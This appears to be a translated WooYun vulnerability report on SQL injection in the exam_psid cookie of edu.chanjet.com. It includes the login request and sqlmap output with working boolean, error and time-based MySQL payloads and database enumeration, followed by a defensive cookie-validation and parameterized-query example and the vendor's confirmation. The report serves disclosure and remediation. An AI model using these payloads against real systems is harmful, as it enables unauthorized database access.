WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2015-06-03: Details have been sent to the vendor and are awaiting the vendor's handling
2015-06-03: Vendor has confirmed; details are disclosed to the vendor only
2015-06-13: Details disclosed to core white hats and experts in related fields
2015-06-23: Details disclosed to regular white hats
2015-07-03: Details disclosed to intern white hats
2015-07-18: Details disclosed to the public
[HD] In the name of the team, for the honor of the individual, building network security together
POST request packet:
POST /new/index.php?user-app-login HTTP/1.1
Host: edu.chanjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://edu.chanjet.com/new/index.php?user-app-login
Content-Length: 123
Cookie: exam_psid=f41d75a1acd6f06ee7b957b761436a3d; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

args%5Busername%5D=admin&args%5Buserpassword%5D=admin&userlogin=1&userhash=0.16833434912554046&userhash=0.1766851977663817
SQL injection in the Cookie parameter exam_psid (see the Proof of Vulnerability section for the specific injection parameter and payloads)
Since only one database was enumerated, I did not dig any further.
Cookie parameter 'exam_psid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 593 HTTP(s) requests:
---
Parameter: exam_psid (Cookie)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: exam_psid=f41d75a1acd6f06ee7b957b761436a3d' RLIKE (SELECT (CASE WHEN (3605=3605) THEN 0x6634316437356131616364366630366565376239353762373631343336613364 ELSE 0x28 END)) AND 'dDxP'='dDxP; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: exam_psid=f41d75a1acd6f06ee7b957b761436a3d' AND EXTRACTVALUE(8268,CONCAT(0x5c,0x717a6a6271,(SELECT (ELT(8268=8268,1))),0x7176717071)) AND 'MCcv'='MCcv; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: exam_psid=f41d75a1acd6f06ee7b957b761436a3d' AND SLEEP(5) AND 'svan'='svan; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432
---
[14:47:41] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.1
[14:47:41] [INFO] fetching database names
[14:47:47] [WARNING] the SQL query provided does not return any output
[14:47:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:47:47] [INFO] fetching number of databases
[14:47:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:47] [INFO] retrieved:
[14:48:03] [INFO] retrieved:
[14:48:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[14:48:52] [ERROR] unable to retrieve the number of databases
[14:48:52] [INFO] falling back to current database
[14:48:52] [INFO] fetching current database
[14:48:58] [INFO] retrieved: edu
available databases [1]:
[*] edu
[14:48:58] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\edu.chanjet.com'
[*] shutting down at 14:48:58
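An added example, not part of this report and not the vendor's application code (which the page does not show): the root cause is a session cookie that reaches a SQL query as raw text. The Python below treats exam_psid as an opaque 32-character hex token, rejects the three payload shapes sqlmap reported above before they reach the database, and performs the lookup with a bound parameter. The session table, cookie headers and the use of sqlite3 as a stand-in for MySQL are all constructed for the example.

```python
import re
import sqlite3

# The session cookie in the report is a 32-character hex token; anything else is refused
# before it can reach a query. (Assumed format for the example; the real app's code is not on the page.)
SESSION_ID_RE = re.compile(r"\A[0-9a-f]{32}\Z")

# Constructed Cookie headers: a normal request, then the boolean-, error- and time-based
# payloads sqlmap reported against exam_psid (tracking cookies shortened for readability).
LEGIT = "exam_psid=f41d75a1acd6f06ee7b957b761436a3d; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432"
PAYLOADS = [
    "exam_psid=f41d75a1acd6f06ee7b957b761436a3d' RLIKE (SELECT (CASE WHEN (3605=3605) THEN 0x66 ELSE 0x28 END)) AND 'dDxP'='dDxP; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432",
    "exam_psid=f41d75a1acd6f06ee7b957b761436a3d' AND EXTRACTVALUE(8268,CONCAT(0x5c,0x717a6a6271,(SELECT (ELT(8268=8268,1))),0x7176717071)) AND 'MCcv'='MCcv",
    "exam_psid=f41d75a1acd6f06ee7b957b761436a3d' AND SLEEP(5) AND 'svan'='svan",
]


def parse_cookie_header(header):
    """Split a raw Cookie header into {name: value}; the first occurrence of a name wins."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name and name not in cookies:
            cookies[name] = value
    return cookies


def session_id_from_header(header):
    """Return the exam_psid value only if it is a well-formed token, otherwise None."""
    value = parse_cookie_header(header).get("exam_psid", "")
    return value if SESSION_ID_RE.match(value) else None


def make_session_store():
    """In-memory stand-in for the sessions table (sqlite3 instead of the report's MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (psid TEXT PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO sessions VALUES (?, ?)", ("f41d75a1acd6f06ee7b957b761436a3d", "alice"))
    return conn


def resolve_user(conn, header):
    """Validate the cookie first, then look it up with a bound parameter, never by concatenation."""
    psid = session_id_from_header(header)
    if psid is None:
        return None  # malformed token: drop the session instead of querying with it
    row = conn.execute("SELECT username FROM sessions WHERE psid = ?", (psid,)).fetchone()
    return row[0] if row else None


def count_malformed_session_cookies(headers):
    """Log-review helper: how many Cookie headers carry an exam_psid that is not a clean token."""
    return sum(1 for h in headers if session_id_from_header(h) is None)
```

Run against access logs, count_malformed_session_cookies gives a quick signal of probing against the cookie, since a legitimate client never sends anything but the 32-hex token.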
Severity: Medium
Vulnerability Rank: 8
Confirmation time: 2015-06-03 16:40
Thank you for your attention and support. The issue exists and we are fixing it.
None yet